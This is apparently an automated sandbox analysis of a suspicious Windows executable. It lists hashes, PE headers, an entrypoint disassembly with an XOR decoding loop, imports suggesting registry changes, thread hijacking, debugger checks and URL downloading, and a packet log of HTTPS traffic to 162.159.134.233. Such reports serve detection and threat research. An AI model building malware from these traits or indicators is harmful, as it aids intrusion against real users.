File name:	sNifdpWiY9.exe
File size:	3'188'321 bytes
MD5:	897699bdf92b6380fa7abd4fda6794ca
SHA1:	16e0a3d46f9850c3f1c638c62607890068eb0423
SHA256:	2c9c4c1ca31e6b9152ee5f772f6689fa2aa9df95e155aecbe4ef0ed054bfce3c
SHA512:	d8ce1f5371749f8bb5b3927bed623bd7fb373205598671cd9577fbda8e1cf2a3f309c8cc641ab0a77afadedb7a92e41d19f99ff3a5a7cbd557c6ddb7d49f6df2
SSDEEP:	49152:/o3ekZ+oKzRaR5sYjv5TlC05hYDqC3Td+TU:/ov+oKzRaU6W05hYDqC3Td+TU
TLSH:	AFE5094369DB0DE9CED677B4A5C31335A734FD71CA2A1F2B6A08C23129536C4AE1EB50
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....MQg.0........&....+.......................@....................................3.0...`... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x1400013e0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x67514DEA [Thu Dec 5 06:53:30 2024 UTC]
TLS Callbacks:	0x4000e960, 0x1, 0x4000e940, 0x1, 0x4001da50, 0x1
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	213420958f19349587a5b7c3979bf497

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [000F3EB5h]
mov dword ptr [eax], 00000000h
call 00007EFC60CDBF7Fh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
jmp 00007EFC60CF5C50h
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007EFC60CDC1D9h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
push ebx
dec eax
sub esp, 38h
dec eax
lea ebp, dword ptr [esp+30h]
dec eax
mov dword ptr [ebp+20h], ecx
dec eax
mov dword ptr [ebp+28h], edx
inc esp
mov eax, eax
mov byte ptr [ebp+30h], al
dec eax
mov edx, dword ptr [ebp+28h]
dec eax
mov eax, dword ptr [ebp+20h]
dec eax
mov ecx, eax
call 00007EFC60DADD3Ch
dec eax
mov dword ptr [ebp-08h], 00000000h
jmp 00007EFC60CDC20Fh
dec eax
mov edx, dword ptr [ebp-08h]
dec eax
mov eax, dword ptr [ebp+20h]
dec eax
mov ecx, eax
call 00007EFC60DAE7E2h
movzx edx, byte ptr [eax]
xor dl, byte ptr [ebp+30h]
mov byte ptr [eax], dl
dec eax
add dword ptr [ebp-08h], 01h
dec eax
mov eax, dword ptr [ebp+28h]
dec eax
mov ecx, eax
call 00007EFC60D10F19h
dec eax
cmp dword ptr [ebp-08h], eax
setb al
test al, al
jne 00007EFC60CDC1BEh
jmp 00007EFC60CDC20Ch
dec eax
mov ebx, eax
dec eax
mov eax, dword ptr [ebp+20h]
dec eax
mov ecx, eax
call 00007EFC60DAE5CDh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x121000	0x1bb8	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x125000	0x4e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x101000	0xc480	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x126000	0x1768	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xf38c0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1216c0	0x630	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xe8080	0xe8200	943e1bb4f45b0dcefc60204cd1d567e5	False	0.3787653136779752	data	6.167871245080012	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xea000	0x30e0	0x3200	63dfa0840750b6caa441391b1e9de428	False	0.029375	data	0.3934755371444657	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xee000	0x12c90	0x12e00	f1016fedfd4c903c44d951fd48ae20d9	False	0.20414683360927152	data	4.985747226629727	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x101000	0xc480	0xc600	03d7df49b22099bd925945761fd2256e	False	0.5213068181818182	data	5.968171154622952	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0x10e000	0x11b60	0x11c00	2d8cdf81c092da6c100435001fde9967	False	0.21024977992957747	data	4.99186112176398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x120000	0xc70	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x121000	0x1bb8	0x1c00	0c6146c8819491068dca2ae8c5ed8850	False	0.31529017857142855	data	4.619188818659977	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x123000	0x68	0x200	8281acdab88920645a2643896879d79e	False	0.076171875	data	0.3586856557867809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x124000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x125000	0x4e8	0x600	54ea7a27371c7f4b4f690ae8ae40bab3	False	0.333984375	data	4.783136965822635	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x126000	0x1768	0x1800	6989afab9be7629c3e3fdbd603449cf0	False	0.3997395833333333	data	5.414507326483683	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/4	0x128000	0xb80	0xc00	35ae9879fddb0eaacb80bacaa68c6612	False	0.2099609375	data	1.911881271017625	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/19	0x129000	0x1b380	0x1b400	9a0485ad1b017c8ecc924b890fd76d85	False	0.4137847620412844	data	5.790395323757767	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/31	0x145000	0x56d9	0x5800	4fb81f09157eb18fedc2b78103f8c10a	False	0.21750710227272727	data	4.811724009546016	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/45	0x14b000	0xbe8f	0xc000	492341fa7c547fae44484898d5572635	False	0.5013427734375	data	5.028312388409318	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/57	0x157000	0x2398	0x2400	cf698c7bfa3b4fe09c9d9f01c7496348	False	0.2734375	data	4.614778901409446	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/70	0x15a000	0x432	0x600	421bae777c354aa9ef112a8d01cb6177	False	0.3255208333333333	data	3.9937954600566736	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/81	0x15b000	0x39f8	0x3a00	b6f7a22786b081e2e07f91e6f1b81269	False	0.1058728448275862	data	4.937443619036112	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/97	0x15f000	0xe3f7	0xe400	181e2e0ab309c0e76863241b023e8031	False	0.5087719298245614	data	5.9247086423605255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/113	0x16e000	0x6cc	0x800	3a33bec181ddf2b605fc24a8e6bd2693	False	0.63818359375	data	5.359140128070618	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x125058	0x48f	XML 1.0 document, ASCII text			0.40102827763496146

Imports

DLL	Import
ADVAPI32.dll	AllocateAndInitializeSid, CheckTokenMembership, FreeSid, RegCloseKey, RegOpenKeyExA, RegSetValueExA
KERNEL32.dll	CloseHandle, CreateEventA, CreateFileW, CreateHardLinkW, CreateProcessA, CreateSemaphoreA, DeleteCriticalSection, DeleteFileW, DuplicateHandle, EnterCriticalSection, ExitProcess, FindFirstVolumeW, FindNextVolumeW, FindVolumeClose, FormatMessageA, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetDiskFreeSpaceExW, GetFileAttributesW, GetFileInformationByHandle, GetFileSizeEx, GetFileType, GetFullPathNameW, GetHandleInformation, GetLastError, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessAffinityMask, GetSystemTimeAsFileTime, GetTempPathW, GetThreadContext, GetThreadPriority, GetTickCount, GetVolumeInformationW, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, IsProcessorFeaturePresent, LeaveCriticalSection, LoadLibraryW, LocalFree, MoveFileExW, MultiByteToWideChar, OpenProcess, OutputDebugStringA, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, ReleaseSemaphore, RemoveDirectoryW, ResetEvent, ResumeThread, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetEndOfFile, SetEvent, SetFileAttributesA, SetFilePointer, SetLastError, SetProcessAffinityMask, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, Sleep, SuspendThread, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WideCharToMultiByte
msvcrt.dll	__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _beginthreadex, _cexit, _close, _commode, _endthreadex, _errno, _fdopen, _findclose, _fileno, _filelengthi64, _fileno, _fmode, _fstat64, _get_osfhandle, _initterm, _lseeki64, _read, _setjmp, _strdup, _telli64, _vscprintf, _vsnprintf, _wchdir, _wchmod, _wfindfirst64, _wfindnext64, _wfopen, _wfullpath, _wgetcwd, _wmkdir, _wopen, _wstat64, _wutime64, abort, atexit, calloc, _write, exit, fclose, fflush, fgetpos, fopen, fprintf, fputc, fputs, fread, free, fsetpos, fwrite, getc, getenv, getwc, iswctype, localeconv, longjmp, malloc, mbstowcs, memchr, memcmp, memcpy, memmove, memset, printf, putc, putwc, realloc, setlocale, setvbuf, signal, strchr, strcmp, strcoll, strerror, strftime, strlen, strncmp, strtoul, strxfrm, towlower, towupper, ungetc, vfprintf, ungetwc, wcscat, wcscmp, wcscoll, wcscpy, wcsftime, wcslen, wcsxfrm
SHELL32.dll	ShellExecuteExA
USER32.dll	MessageBoxA
WININET.dll	InternetCloseHandle, InternetOpenA, InternetOpenUrlA, InternetReadFile

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 11:41:03.278028011 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:03.278069019 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:03.278163910 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:03.289587021 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:03.289603949 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:04.508706093 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:04.508799076 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:04.674242973 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:04.674278975 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:04.674657106 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:04.674721003 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:04.676657915 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:04.723321915 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.030381918 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.030456066 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.030459881 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.030482054 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.030500889 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.030544996 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.030725956 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.030771017 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.030777931 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.030812979 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.031249046 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.031295061 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.031830072 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.031878948 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.036484957 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.036550045 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.036642075 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.036688089 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.044473886 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.044528961 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.044617891 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.044681072 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.053447008 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.053512096 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.150374889 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.150435925 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.219744921 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.219805956 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.223301888 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.223356962 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.223522902 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.223587990 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.231165886 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.231225014 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.231389999 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.231440067 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.239063978 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.240051031 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.240063906 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.240128994 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.247133017 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.251120090 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.254888058 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.255234957 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.255244017 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.255295038 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.262763977 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.263130903 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.263138056 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.263178110 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.270700932 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.271100998 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.271110058 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.271173954 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.278562069 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.279115915 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.279128075 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.283122063 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.287328005 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.291131020 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.293412924 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.293493032 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.293572903 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.293617010 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.300520897 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.301107883 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.411475897 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.411560059 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.413764000 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.413892984 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.413934946 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.413984060 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.413992882 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.414038897 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.414074898 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.414086103 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.414247990 CET	49700	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.414264917 CET	443	49700	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.430583000 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.430625916 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:05.430711031 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.430898905 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:05.430912971 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:06.652859926 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:06.653117895 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:06.654234886 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:06.654242039 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:06.654484987 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:06.654495955 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.128981113 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.129626036 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.129652977 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.129743099 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.129759073 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.129784107 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.129801989 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.130501032 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.131120920 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.131408930 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.131445885 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.131453037 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.131495953 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.132320881 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.132359982 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.132365942 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.132407904 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.134696007 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.134788990 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.134903908 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.135121107 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.321521044 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.322251081 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.322283983 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.322388887 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.322402000 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.322421074 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.322458982 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.322741032 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.323117971 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.323124886 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.323198080 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.329689026 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.331154108 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.331161976 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.331213951 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.339148998 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.341430902 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.346745968 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.347134113 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.347242117 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.347289085 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.355022907 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.355103016 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.355165958 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.359136105 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.362951994 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.363007069 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.363087893 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.365195990 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.369914055 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.371121883 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.377789021 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.379138947 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.379148960 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.379204988 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.385812998 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.387132883 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.387140989 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.387181044 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.393522024 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.395122051 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.395136118 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.395205021 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.401120901 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.401184082 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.408704042 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.408790112 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.512739897 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.514476061 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.514519930 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.514550924 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.514554977 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.514578104 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.514600992 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.514643908 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.516860008 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.517184973 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.525469065 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.525558949 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.533864021 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.533982038 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.538206100 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.538294077 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.542488098 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.542550087 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.550384045 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.550499916 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.558566093 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.558650970 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.562886000 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.562958956 CET	49701	443	192.168.2.7	162.159.134.233
